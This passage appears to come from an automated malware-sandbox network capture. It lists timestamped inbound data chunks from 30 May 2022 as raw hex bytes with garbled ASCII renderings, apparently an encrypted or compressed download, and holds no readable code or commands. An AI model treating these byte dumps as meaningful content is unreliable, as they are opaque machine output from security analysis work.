1b ad f1 f3 e2 be 09 b8 2f 68 70 af 58 e4 2b e7 92 8a 72 f9 98 7d 0e a3 bf e2 ea 03 83 a2 85 94 e1 9b d1 c7 96 73 8d cf f5 71 28 ed f8 b1 15 2d 8d Data Ascii: #E3n$qy1qqg`pa{aj%!"'rxl8Oq:8RpX`U1.PDYbe/xIU2&)'Wn$PYLqdmT-! ;rRQ+VQFTKCh0h/hpX+r}sq(-
2022-05-30 12:45:59 UTC	875	IN	Data Raw: a3 48 e5 f0 6a db 89 3e 96 d1 2c db 48 87 17 9c ad 06 28 b1 d5 70 04 fa 45 69 84 de 49 ce c2 0e 19 b6 e0 cb 41 7d 52 04 de 59 8d be 3d 74 ea 4d 89 90 df 3c 2d 7b 8b 3d b4 7a 60 2b dc bc 74 62 13 a5 57 80 0d 33 96 fb 73 ef c2 a7 dc 41 aa b2 1a 25 62 0e 38 82 10 57 0e 7c 77 ce 6d 73 2c c1 64 23 d8 6b f8 08 67 13 43 10 b1 bc f1 d2 46 75 0c f0 fd c1 cd f8 3a 6d e3 05 67 39 92 43 1e c2 4d 14 fc 69 b5 ec 0d 5d 61 c8 9d e0 da 29 a4 05 fe 39 61 c2 f8 bb 57 3c fb d3 aa 68 e4 4b 0a 3d ee 5a 09 2f 61 9c 67 6d 08 29 d4 d6 4b b9 71 22 9d 62 0a dd 9b d6 26 f4 d3 1c c5 18 9b 1e fd 2f d1 e3 86 31 f8 58 16 2f d9 cc 48 01 84 e6 d4 b2 75 ba 62 ea 04 6e bc 87 60 ac 2a 3d 99 c4 ff 85 ae e5 11 04 10 36 b4 da f6 17 0d c8 c3 d0 3f d2 e2 cb d0 25 b8 de b8 1e 44 c0 47 a4 86 6e 3d Data Ascii: Hj>,H(pEiIA}RY=tM<-{=z`+tbW3sA%b8W\|wms,d#kgCFu:mg9CMi]a)9aW<hK=Z/agm)Kq"b&/1X/Hubn`*=6?%DGn=
2022-05-30 12:45:59 UTC	877	IN	Data Raw: 70 64 62 9e d3 79 3c ec d6 62 91 16 3e 32 7d 4f dd 03 49 04 e1 ff d2 b5 d5 96 b8 b0 af 8a 55 ce 59 ca 33 54 19 1c 0b 55 0d a4 95 f7 7e db 32 59 01 1a 36 67 0c d8 43 19 a1 dc f5 fc 76 ed 79 63 3e b7 df a1 b4 7e ef e7 28 1a 86 30 23 5b 22 a0 d5 02 50 64 8b a1 25 f2 a2 a3 b4 c0 97 2e d2 cc 9b 55 d9 8e 68 59 45 0f af 82 5f 4d d5 cd 3a bc 57 c4 bd b6 1a bb a4 6c 63 19 20 e2 4e 2d 08 65 83 d7 16 44 75 93 0c 97 7e b9 af 3f 1d bb fa 17 74 2d 1a 49 6c ae ff 55 bb ae 83 4e 04 be 7b fe 9a 82 3d 92 1a d2 96 a5 fc 8d 94 80 65 ea ef c9 b7 51 76 36 b8 f0 75 3d 4b d9 28 95 42 42 13 b1 b8 36 48 f8 6d 13 78 03 3a 55 62 ed 32 84 7f 79 32 07 1f bc 67 ad 6f c3 e8 b6 ab b3 a2 3e 53 81 b2 c1 1f 4d 24 95 21 b4 17 ac f2 bd 0b 72 42 ec 95 e5 91 3c 02 29 9a 98 71 ec 25 17 85 e6 85 Data Ascii: pdby<b>2}OIUY3TU~2Y6gCvyc>~(0#["Pd%.UhYE_M:Wlc N-eDu~?t-IlUN{=eQv6u=K(BB6Hmx:Ub2y2go>SM$!rB<)q%
2022-05-30 12:45:59 UTC	878	IN	Data Raw: d2 fe f7 fc e8 e6 70 61 1c a6 cf df a5 63 69 32 c7 ea 7f 37 22 c1 fa 8c 83 9e 65 e9 1c 4a 7c 59 47 b9 e3 32 c8 5a 7c 99 fc 69 42 9e 89 b6 f4 f4 3c 01 6e 4f af c4 f8 47 15 6b c4 80 24 26 df b5 6a 3d 1f ea bd 10 ed cd f2 8f f7 7b b6 f0 99 7e f8 0a 8f bc a7 87 bc 9b ff 81 1d ad b4 e6 49 83 95 e4 87 09 94 84 61 4d a5 03 c6 a0 1d 55 ca 9b 78 8e 7a 2b c2 1c 02 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 cb 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 12 d9 cd b7 69 6f f9 17 60 fa a4 88 af 6b 18 67 b3 39 d3 67 f4 fd 17 a5 3c 7b ae 0b 20 4f 75 d5 d7 61 cd ac 38 bf f8 ac a3 92 5e 9e a9 c0 09 d4 9b 36 d9 e9 42 8a 90 1f 50 ba c2 d7 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 Data Ascii: paci27"eJ\|YG2Z\|iB<nOGk$&j={~IaMUxz+ruo\|nXQ^s.G?TEuX2.l"":>s*^io`kg9g<{ Oua8^6BP.Ma-$
2022-05-30 12:45:59 UTC	879	IN	Data Raw: 23 ae b3 56 bb 33 ea 48 28 53 7e 07 20 88 04 de 93 a5 f2 58 6f 36 8d 73 3b 98 10 f3 7d d8 54 19 dd 4e a7 12 c9 99 52 d2 9d d0 f2 76 65 1c 15 e7 3e 32 05 34 9e 10 ba 0a eb 40 84 14 49 c6 4a ae 23 ff 8c 7e 08 34 4d f4 4a 70 d1 03 1c e7 4a 85 13 29 75 dd 3e f9 bb d5 39 b5 ef 1b bf 6c 49 bd ce 85 60 e5 13 76 53 93 eb 76 71 dd 46 f9 d8 ed 80 c6 e4 0d ed ca fa 50 6b e8 de 5d 4f b1 fa 1e b0 79 c6 c7 60 96 6f 37 dd 58 a2 b2 90 57 ee 1c c0 2e 55 17 17 f0 a7 a9 b5 11 48 35 c3 e8 22 38 ea fe 5d 67 62 4e 3f 31 dc d7 77 46 0c 3c 77 32 7b e6 c8 a5 15 4f 6d 31 7f 5d b5 06 4b b2 93 30 30 57 c1 79 d1 17 31 27 95 d3 d0 ca 72 18 fa 28 0a 42 17 07 ca c1 e0 41 fa 52 b5 f2 94 02 a8 ea f1 70 80 b9 9d 67 23 d5 46 49 d2 fe f7 fc e8 e6 70 61 1c a6 cf df a5 63 69 32 c7 ea 7f 37 22 Data Ascii: #V3H(S~ Xo6s;}TNRve>24@IJ#~4MJpJ)u>9lI`vSvqFPk]Oy`o7XW.UH5"8]gbN?1wF<w2{Om1]K00Wy1'r(BARpg#FIpaci27"
2022-05-30 12:45:59 UTC	881	IN	Data Raw: 2c f2 3c 06 bf 4c bb 42 f7 f4 32 e8 26 18 80 94 fb a5 3f 9e a3 9f 15 e6 63 df a2 f1 f0 4e dd dc b1 1c ec fe 0f c5 52 ce 46 37 99 f9 6c 49 b5 48 fd e5 e7 0a ee c8 85 bd 14 d0 c5 65 4e 46 f5 20 7e 78 38 c9 b6 e9 22 a2 d5 c7 a6 45 8d 36 f8 de 01 22 a4 43 85 d0 54 d0 93 eb 82 60 de 74 bd e8 0f 66 f7 72 b8 d7 eb 0a 9e 94 84 80 9b 74 47 3b c2 43 89 45 d4 af 3c a0 c2 f4 ee 6e ee fa e0 d7 95 75 53 2a f5 15 42 58 98 70 45 c9 1a d3 38 19 48 2b ef 6b 3b 5f 68 5a c6 1e 91 0b ab f0 a8 c5 10 21 0f 60 ed 2a 0a 32 bc fe 5a b2 ad 58 ac 0d 0d 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 c9 76 78 10 5b cc 44 0d 4b 5c 5f f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 bb 33 ea 48 28 53 7e 07 20 88 04 de 93 a5 f2 58 6f Data Ascii: ,<LB2&?cNRF7lIHeNF ~x8"E6"CT`tfrtG;CE<nuSBXpE8H+k;_hZ!`2ZX: Qvx[DK\_2yTB^1+1t3B#V3H(S~ Xo
2022-05-30 12:45:59 UTC	882	IN	Data Raw: ac fb 56 ab 8b b4 81 85 05 c7 84 ec 01 87 75 fc bb d4 fa c9 9c f9 f3 18 a8 c2 ef 3a 81 e3 e3 f8 77 d2 c2 27 0b e3 45 80 e6 5e 55 ca 9b 78 8e 7a 2b c2 1c 02 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 cb 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 24 9b fd 86 5f 2c ca 55 24 b9 e2 b9 97 52 2c 56 f7 09 97 51 c1 c9 2e 97 4c 77 a0 7d 26 3b 03 a2 ae 6f bb da 49 c9 fb ac a7 93 5f 9f aa b1 78 da 9a 32 d1 ec 01 b8 a9 2b 62 f9 f2 96 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 0b 81 bb e3 94 60 17 35 c5 8a 38 a2 05 07 02 3a 7f 2f 64 57 64 77 ed 7f 25 69 fe 4e 8c cd 0c f7 61 39 68 b3 04 36 fa 0e 8b 71 c7 cd 02 ae 10 2f f4 90 fb d1 49 9d a7 Data Ascii: Vu:w'E^Uxz+ruo\|nXQ^s.G?TEuX2.l"":>s*^$_,U$R,VQ.Lw}&;oI_x2+b.Ma-$:\DV3L`58:/dWdw%iNa9h6q/I
2022-05-30 12:45:59 UTC	883	IN	Data Raw: 38 4e 72 0b b2 0c 36 97 45 5a a1 0c c3 55 6f 33 9b 78 bf fd 93 7f f3 d8 5d f9 2a 0f fb 88 c6 60 e5 13 76 53 93 eb 76 71 dd 46 f9 d8 ed 80 c6 e4 0d ed ca fa 50 6b dc 98 18 7c 85 c8 5b 82 3f 83 f6 21 a1 29 0e 9f 60 e7 f7 a7 12 ac 28 81 19 16 27 51 c9 e2 98 83 23 0a 76 86 db 11 0d dd c8 1f 54 53 7b 7a 72 99 94 35 04 3a 08 47 04 43 d5 ff e7 53 7a 5c 77 4a 5d b5 06 4b b2 93 01 73 6e f6 3b 94 51 72 12 a1 91 94 fd 33 20 b8 1e 3f 03 54 41 f2 f8 a6 79 cb 16 81 b6 a0 43 ec a9 c4 46 b5 ff dc 53 16 d5 46 49 d2 fe f7 fc e8 e6 70 61 1c a6 cf df a5 63 69 32 c7 ea 7f 37 08 47 b2 42 be 9d 64 ee 1c 4a 74 59 47 b9 ed 30 c8 5a 7d 99 fc 69 72 9e 89 b6 fb f4 3c 01 3d 0a ec 94 cb 7f 21 39 f5 80 24 26 df b5 6a 3d 59 ac fb 56 ab 8b b4 f0 85 05 c7 84 ec 01 87 75 fc bb d4 84 bf ea Data Ascii: 8Nr6EZUo3x]*`vSvqFPk\|[?!)`('Q#vTS{zr5:GCSz\wJ]Ksn;Qr3 ?TAyCFSFIpaci27GBdJtYG0Z}ir<=!9$&j=YVu
2022-05-30 12:45:59 UTC	884	IN	Data Raw: 8f f0 af 64 e4 93 81 e0 03 cb 70 be 98 47 64 e2 05 c3 96 12 96 d5 ad c4 26 98 32 fb ae 49 20 b1 34 fe 91 ad 49 9e 94 b1 b1 a2 41 74 7e 80 7a bf 74 ec ea 0d e3 fb b5 df 28 d7 c8 d9 96 a7 44 25 2b 8e 11 38 54 99 06 46 cf 63 a5 3d 6f 47 2f e9 18 32 57 1b 2c b3 1d 95 0a dd 8b ae b5 1d 2f 05 17 ec 58 7b 42 bd f6 5a b4 a1 5a a5 05 0f 03 15 82 44 91 e8 ab a5 cc cb da 27 67 fc 44 3b 20 19 88 77 4f 09 6d 1d b6 02 8f 4a 61 31 ef e3 4a f9 7a e7 5e 2f 9a db af 46 20 1b 77 96 1e 00 c5 c7 40 28 c5 06 72 cb ef 13 9e b3 56 bb 02 ac 0e 6e 15 38 41 66 ce 42 98 d5 e3 b4 1e 29 70 cb 35 7d de 56 b5 3b 9e 12 5f 9b 08 e1 54 8f df 14 94 db 96 b4 30 23 5a 53 a1 78 74 43 72 d8 56 fc 4c ad 06 84 14 49 c6 4a ae 23 ff 8c 7e 08 34 4d f3 39 07 af 73 62 96 34 f0 17 29 01 dd 41 89 cb d1 Data Ascii: dpGd&2I 4IAt~zt(D%+8TFc=oG/2W,/X{BZZD'gD; wOmJa1Jz^/F w@(rVn8AfB)p5}V;_T0#ZSxtCrVLIJ#~4M9sb4)A
2022-05-30 12:45:59 UTC	886	IN	Data Raw: 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 cb 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 12 d9 cd b7 69 6f f9 17 60 fa a4 88 af 6b 18 67 b3 39 d3 67 f4 fd 17 a5 7d 43 97 48 65 7a 34 93 ef 56 ff 98 7b 8f b9 9e 90 d7 6e db 99 86 4f e3 ac 03 e9 d9 42 8a 90 1f 50 ba c2 d7 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 43 fb fd e3 94 60 17 35 c7 8a 38 a2 06 07 02 3a 7a 2f 64 57 63 77 ed 7f 2e 69 fe 4e 81 cd 0c f7 70 39 68 b3 17 36 fa 0e 9c 71 c7 cd 1f ae 10 2f dc d6 bd 97 2a db e1 ab 0f a7 52 e7 b1 c1 c0 08 c6 9a f7 2c 98 b8 4b fd 5b 88 00 06 94 c8 5e 49 f6 48 fd e5 a0 0a ee c8 cc bd 14 d0 8a 65 4e 46 a6 20 7e 78 61 c9 b6 e9 43 a2 d5 c7 c3 45 8d 36 9f de 01 22 cf 43 85 d0 39 d0 Data Ascii: nXQ^s.G?TEuX2.l"":>s^io`kg9g}CHez4V{nOBP.Ma-$:\DV3LC`58:z/dWcw.iNp9h6q/R,K[^IHeNF ~xaCE6"C9
2022-05-30 12:45:59 UTC	887	IN	Data Raw: 08 0e 61 db 71 d1 a6 64 99 f8 de a8 13 9a fc fa 13 01 58 79 77 5f d0 a6 65 d8 fe 39 5d 22 2c cf d6 62 84 72 1e c6 86 9f f8 18 09 40 eb fc 84 15 f2 bb 7b 97 dd d5 aa d2 50 5a ea 9d b6 89 f6 d3 16 c3 d4 81 f4 1d 37 7d 1b 9d c0 54 f1 3c 81 5e d5 ab 73 ce 8c 1c 56 e5 2f f3 55 fd f0 86 0b 6c c6 1d b8 98 c3 4e ce ef ee 64 fa be f1 f4 40 de 24 42 da cc 7a 29 3c d0 b5 79 87 37 e0 45 76 da c2 93 ad b5 a6 ce 2c 94 7f 45 94 32 e1 cd 24 ba 64 d2 e1 11 20 cc 8c 88 65 42 1a c4 8c 65 2e 6b b5 34 db a0 38 b6 3d 7f 2c 12 6c 7d df 62 f2 b7 48 35 ae 60 1e 37 54 3b a9 70 c8 73 e5 a0 22 82 09 38 2e 25 4e d4 e4 69 ec d5 80 e7 dc 5d 81 d3 5a 9d 7a cd 1a 92 62 96 1e c1 8f 2e 0e 2d 59 cc fc e2 38 20 c3 87 19 be 09 96 10 e5 ce c9 5a ae 29 60 3f 3e 6b 41 a7 5d b2 24 3f eb 84 ba f8 Data Ascii: aqdXyw_e9]",br@{PZ7}T<^sV/UlNd@$Bz)<y7Ev,E2$d eBe.k48=,l}bH5`7T;ps"8.%Ni]Zzb.-Y8 Z)`?>kA]$?
2022-05-30 12:45:59 UTC	888	IN	Data Raw: 00 08 ad 5b 03 eb 22 f0 79 4b 70 32 dc 30 0b 1e 59 7a 82 4f d3 39 9f b3 ec c5 6c 45 6c 6a 95 44 3d 2f 8d e5 1f 85 94 6c 94 4c 3c 54 20 d4 01 d2 df 87 9c 92 fc f9 16 36 c9 13 78 3f 5b bc 44 63 4b 3b 5f f0 32 dc 79 35 06 a8 a7 0c c1 35 d4 74 1d bd e8 c4 00 34 5e 01 a2 1f 31 ea 83 51 1e b7 33 70 f8 c0 23 8b b3 66 bb 01 ea 21 28 0c 7e 22 20 b8 04 ec 93 cc f2 7d 6f 06 8d 41 3b f1 10 d6 7d e8 54 2b dd 27 a7 12 c9 ed 52 bb 9d bd f2 13 65 43 15 c2 3e 02 05 00 9e 79 ba 2f eb 70 c2 60 0f e9 0c cd 65 89 ca 0a 4e 1b 0b ed 0c 13 97 75 5a 93 0c aa 55 4a 33 ab 78 8d fd fa 7f d6 d8 6d f9 18 0f 92 88 c6 60 e5 13 ce 1c d2 eb 6c 21 9c 46 f0 d8 ed 80 a7 88 6c 9f a7 d4 27 0a 9e de 5d 4f b0 fa 1e b0 38 aa a6 12 fb 4f 43 af 31 c5 d5 f5 25 8b 78 c0 2e 55 17 17 d0 a7 c8 b5 7d 48 Data Ascii: ["yKp20YzO9lEljD=/lL<T 6x?[DcK;_2y55t4^1Q3p#f!(~" }oA;}T+'ReC>y/p`eNuZUJ3xm`l!Fl']O8OC1%x.U}H
2022-05-30 12:45:59 UTC	889	IN	Data Raw: 23 bc dd 47 e4 2f 02 da 0d 31 3f 66 c0 c2 7b d2 b5 56 8f b9 9e bd fa 43 f6 b4 c3 01 a7 8c 47 a1 f9 12 cb c2 5e 1d ff 96 92 9f 7d d3 96 60 24 e5 b3 4c 00 a6 09 c9 78 19 03 1f a5 8e 6b 28 7c 9f a4 3c 59 cd 96 ce b9 4d 3a 35 c5 8a 38 8f 28 2a 2f 17 3a 61 20 77 3c 42 dd 46 05 2a ac 02 a1 e0 21 da 4c 39 68 9e 29 1b d7 23 c9 34 80 84 4c 8e 42 7c 82 f6 ed c5 46 8d a0 ff 63 87 19 a2 c3 ec ed 25 c4 b7 f7 01 80 95 66 d0 25 c6 44 26 fb 9b 1f 69 e5 1a b4 b3 a6 5e ab e8 ce f8 4d fd e8 48 63 6b f5 20 7e 55 15 e4 9b c4 60 e7 92 8e e8 65 dd 64 b1 88 40 76 e1 63 ce 95 0d fd be c6 af 4d de 59 90 c5 22 4b b2 3c fc f7 bb 58 d7 c2 c5 d4 de 54 0c 7e 9b 6e a4 68 f9 82 3c a0 c2 d9 c3 43 c3 d7 a2 92 d2 3c 2a 3b 89 69 43 33 f4 66 57 cf 66 b7 29 7c 39 4b 9d 0e 4e 4e 12 5a db 05 fe Data Ascii: #G/1?f{VCG^}`$Lxk(\|<YM:58(/:a w<BF!L9h)#4LB\|Fc%f%D&i^MHck ~U`ed@vcMY"K<XT~nh<C<*;iC3fWf)\|9KNNZ
2022-05-30 12:45:59 UTC	891	IN	Data Raw: 91 94 fd 33 20 b8 1e 3f 03 08 fb b4 f8 2a 04 8d 16 81 b6 a0 43 ec a9 c4 46 b7 ff dc 53 8a a8 00 49 7a 83 b1 fc 28 9a 36 61 1c a6 cf df f9 d9 2f 32 c6 ea 7f 37 22 c1 fa 8c 7c 61 9a 16 1c 4a 7c 59 07 b9 e3 32 44 27 3a 99 fc 69 42 9e 89 b6 f4 f4 3c 01 6e 4f d3 7e be 47 cd 16 82 80 24 26 df b5 6a 3d 1f ea be 10 ed cd 1a cb 85 43 79 bf ec 47 69 4e fc fd 52 be bf ac c9 c3 28 98 8e 65 4c b1 d1 d4 be 31 94 84 61 4d 5a fc 39 5f 1d 55 ca 9b 38 8e 7a 2b 1a 61 44 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 16 3e 53 1f 37 6a ca 6e 58 51 b5 5e 73 b1 9c 2e 44 c9 db 3f 6c b5 47 b8 0d ae 33 bc f0 4f 8a 12 6c 82 68 6c 22 b6 22 3a 23 2a d7 3e 71 c3 2a 1b 5e 9d 12 d9 32 48 96 90 f9 17 60 fa e4 88 af 6b 30 19 f5 39 d3 67 f4 fd 17 a5 7d 43 97 48 65 7a 28 2f a9 56 87 e6 3d 8f b9 9e Data Ascii: 3 ?CFSIz(6a/27"\|aJ\|Y2D':iB<nO~G$&j=CyGiNR(eL1aMZ9_U8z+aDruo\|>S7jnXQ^s.D?lG3Olhl"":#>q*^2H`k09g}CHez(/V=
2022-05-30 12:45:59 UTC	891	IN	Data Raw: dc a7 f7 00 0c 70 08 74 7b 3a b6 e3 15 c7 12 77 7f 5d b5 06 4b f6 28 47 73 6d f6 3b 94 51 72 12 a1 6e 6b 02 cc 20 b8 1e 3f 43 54 41 f2 b4 26 3f cb 16 81 b6 a0 43 ec a9 c4 46 b5 ff dc 37 ad 93 46 e9 52 b8 f7 fc e8 e6 70 60 1c a6 cf db a5 63 69 82 47 ac 7f f3 a2 87 fa c0 fc d8 65 35 62 0c 7c d1 38 ff e3 32 c8 5a 7c fd 47 2f 42 9d 89 b6 f4 f4 3c 01 6e b0 50 3b 07 47 15 6b c4 c0 24 26 df 15 ea 7b 1f ea bd 10 ed cd f2 b6 c3 43 81 c2 aa c3 7a 75 ba 09 12 84 f9 ac c9 c3 28 99 f2 df 0a b4 d3 d4 be 35 15 c2 61 51 24 45 c6 64 9d 13 ca d7 07 c8 7a f7 bc 5a 02 3f 8d 34 9b 75 dc b1 e0 6b d4 3a 12 02 8a 84 15 1f 1f 14 8c 91 a7 ae 4a 5e 73 b1 9c 6e 47 c9 db cb d4 8d 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e cc 99 f0 22 76 3e d6 91 3e 73 c3 2a 1a 5e 9d 12 dc cd b7 69 33 78 Data Ascii: pt{:w]K(Gsm;Qrnk ?CTA&?CF7FRp`ciGe5b\|82Z\|G/B<nP;Gk$&{Czu(5aQ$EdzZ?4uk:J^snGEuX2."v>>s*^i3x
2022-05-30 12:45:59 UTC	893	IN	Data Raw: f9 ae 3b f7 94 d4 28 3a 3c 0e 12 b3 01 fc bd 9d ef ff fc 98 16 51 39 70 78 14 5b cc 44 23 3f 30 2c f0 32 b8 79 50 f6 da a7 08 c1 42 d4 34 69 b5 9b bf 00 11 5e 39 52 2d 31 82 83 74 1e a9 47 2e 8b 8d 79 f4 e9 56 bb 33 ea 48 28 54 7e c7 20 88 04 f0 f4 c3 9b 3c 1c 12 f5 73 3b 98 10 33 7d df 54 69 dc 4e a7 3c ae ff 3b b6 ee f4 8b 76 65 1c 15 e7 2e 35 05 04 9f 10 ba 24 99 33 b0 31 2b b0 3d e8 65 b9 ca 08 5f 75 0b 32 48 36 97 6b 28 d2 7e a0 71 5f 01 9b 78 bf fd 93 7f f3 d8 5d f9 2a 0f fb 88 c6 60 e5 13 76 53 93 eb 76 71 ff 43 6a c1 ef 80 c6 e4 49 6b 8c fa 51 6b e8 de 09 c9 f7 fa 1e b0 79 c6 c7 60 96 6f 37 dd 58 a2 b2 90 57 ee e3 3f d1 aa 17 17 f0 a7 56 4a ee b7 35 c3 e8 22 38 ea fe 5d 67 62 4e 3f 30 dc d7 77 47 0c 3c 77 5a fd a0 c8 a5 15 4f 6d 31 7f 5d b5 06 4b Data Ascii: ;(:<Q9px[D#?0,2yPB4i^9R-1tG.yV3H(T~ <s;3}TiN<;ve.5$31+=e_u2H6k(~q_x]*`vSvqCjIkQky`o7XW?VJ5"8]gbN?0wG<wZOm1]K
2022-05-30 12:45:59 UTC	894	IN	Data Raw: 8a 91 1f 50 ba c3 d7 cd 2e 66 31 0b 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb 34 7f 5c 4c 84 81 ec 12 83 bb e3 94 ac 9d 73 c5 8b 38 a2 05 db 88 7c 7f 2f 64 57 64 77 ed 7f 25 69 fe 4e 8c cd 0c f7 61 c6 97 4c fb 36 fa 0e 8b 8e 38 32 fd ae 10 2f c3 d6 bd 97 0f db e1 ab 26 a6 52 e7 9a c0 c0 08 e9 6a 7d 6a ad b8 4b fd 60 88 00 06 a9 c8 5e 49 b5 02 9a a4 e7 28 eb 5b 9c bf 14 d0 c5 41 c5 00 f5 21 7e 78 38 fd 3d af 22 a2 d5 c7 a6 45 8d 36 f8 de 01 22 a4 43 85 d0 54 2f 6c 14 7d 60 de 74 bd 17 f0 99 08 72 b8 d7 eb 0a 9e 94 84 80 9b 74 47 3a c2 43 89 44 d4 af 3c e8 49 b2 ee 6e ee fa e0 d7 95 75 64 1b cc 27 00 b8 3f 77 03 a8 27 04 60 2c 70 1d dc 26 80 28 59 1e 82 28 d3 b5 14 f5 ec 81 25 16 3c 26 d4 1d 3d 73 8d cf 1f 85 94 6c 94 c3 c3 c5 df b3 01 d2 df 11 63 00 03 98 16 Data Ascii: P.f1a-$:\DV4\Ls8\|/dWdw%iNaL682/&Rj}jK`^I([A!~x8="E6"CT/l}`trtG:CD<Inud'?w'`,p&(Y(%<&=slc
2022-05-30 12:45:59 UTC	895	IN	Data Raw: 01 f7 fc e8 e6 a4 9e e3 59 cf df a5 63 97 cd 38 15 7f 37 22 c1 71 09 c0 9e 65 e9 1c 4a 82 a6 b8 46 e3 32 c8 5a a8 66 03 96 42 9e 89 b6 0a 0b c3 fe 6e 4f af c4 73 cb 56 6b c4 80 24 26 21 4a 95 c2 1f ea bd 10 39 32 0d 49 c3 43 81 c2 54 b8 3e cc ba fd 92 c2 8b 22 8a c3 28 98 f2 df f4 4e 2c 2b be 31 94 84 a5 b2 5a fc c6 a0 1d 55 34 64 87 71 7a 2b c2 1c 19 39 b1 72 9b 75 dc b1 e0 ef 6f 7c fc 8b c9 84 eb e0 e0 eb 8c 6e 58 51 65 a1 8c 4e 9c 2e 47 c9 25 c0 ab 34 01 b8 45 d0 1c 33 1b 32 cc 12 ac fe d0 93 dd 49 22 3a bf 90 41 c1 8c 3c 2a 1b 5e 9d ec 26 32 48 69 6f f9 17 a9 6a e7 88 af 6b 18 67 4d c6 2c 98 f4 fd 17 a5 a9 bc 68 b7 65 7a 34 93 11 a9 00 67 7b 8f b9 9e 3a 45 2d db 99 86 4f e3 52 fc 16 26 42 8a 90 1f 84 45 3d 28 cd 2e fe bb b3 f6 37 4c 61 2d 8b 24 c5 ac Data Ascii: Yc87"qeJF2ZfBnOsVk$&!J92ICT>"(N,+1ZU4dqz+9ruo\|nXQeN.G%4E32I":A<*^&2HiojkgM,hez4g{:E-OR&BE=(.7La-$
2022-05-30 12:45:59 UTC	897	IN	Data Raw: 51 b3 56 bb 33 14 b7 d7 ac 7e 07 20 88 c4 66 d7 a5 f2 58 6f 36 73 8c c4 67 10 f3 7d d8 80 e6 22 b1 a7 12 c9 99 ac 2d 62 2f f2 76 65 1c 06 51 7a 32 05 34 9e 10 44 f5 14 bf c2 52 0f 80 c8 17 9a 46 ca 38 4e 72 f5 4d f3 c9 97 45 5a a1 87 7e 11 6f 33 9b 78 bf 03 6c 80 0c d8 5d f9 2a c3 04 77 39 60 e5 13 76 ad 6c 14 89 71 dd 46 f9 47 56 c4 c6 e4 0d ed ca 04 af 94 17 de 5d 4f b1 2e e1 4f 86 c6 c7 60 96 91 c8 22 a7 a2 b2 90 57 e8 d3 84 2e 55 17 17 f0 59 56 4a ee 48 35 c3 e8 fa c7 15 01 5d 67 62 4e c1 ce 23 28 7a b4 48 3c 5e c0 3f e6 c8 a5 15 4f 93 ce 80 a2 b5 06 4b b2 43 fe 8c 91 f6 3b 94 51 8c ed 5e 6e 94 fd 33 20 02 11 7a 03 54 41 f2 f8 58 86 34 e9 81 b6 a0 43 34 56 3b b9 b5 ff dc 53 e8 2a b9 b6 0b d2 b2 fc 04 ca 35 61 1d a6 cf df 11 f6 2f 32 c6 ea 7f 37 ce 7a Data Ascii: QV3~ fXo6sg}"-b/veQz24DRF8NrMEZ~o3xl]w9`vlqFGV]O.O`"W.UYVJH5]gbN#(zH<^?OKC;Q^n3 zTAX4C4V;S5a/27z
2022-05-30 12:45:59 UTC	898	IN	Data Raw: b3 34 9b fc 0e 95 dc c1 cd 16 03 16 2f c5 7b bb 97 1b 44 e7 ab 20 38 54 e7 70 5f c6 08 33 04 f1 2c 65 26 4d fd da 16 06 06 01 56 58 49 d5 d4 fb e5 7f 94 e8 c8 07 23 12 d0 ab fb 48 46 af be 78 78 76 57 b0 e9 18 3c d3 c7 86 db 8b 36 ea 40 07 22 58 de 83 d0 a4 4d 95 eb 66 fd d8 74 69 75 09 66 33 ef be d7 5f 97 98 94 26 1d 9d 74 d3 a6 c4 43 0b d8 d2 af 4e 3d c4 f4 8a f3 e8 fa b0 4a 93 75 20 86 ca 27 38 fc ab 36 29 17 24 97 63 b3 76 1d d6 c7 0d 6e a3 83 84 28 3d a5 99 b3 32 1d 23 16 f4 ba d2 1d fd ef 8b cf b5 19 92 6c 08 a0 3a 3a ae 2f 07 d2 5f 72 9a ff 88 04 10 51 ab d4 7e 10 a3 60 42 0d a7 f0 59 f0 f6 14 7f 54 a8 70 a1 0c 5f ee d2 1a 93 75 ee 9b 78 bd 58 31 c0 87 37 83 cb d8 18 87 01 ee fe a9 35 02 b5 56 bf 9f ec 48 ce f8 78 07 ea 23 02 de 25 0e f4 58 cd 9d Data Ascii: 4/{D 8Tp_3,e&MVXI#HFxxvW<6@"XMftiuf3_&tCN=Ju '86)$cvn(=2#l::/_rQ~`BYTp_uxX175VHx#%X
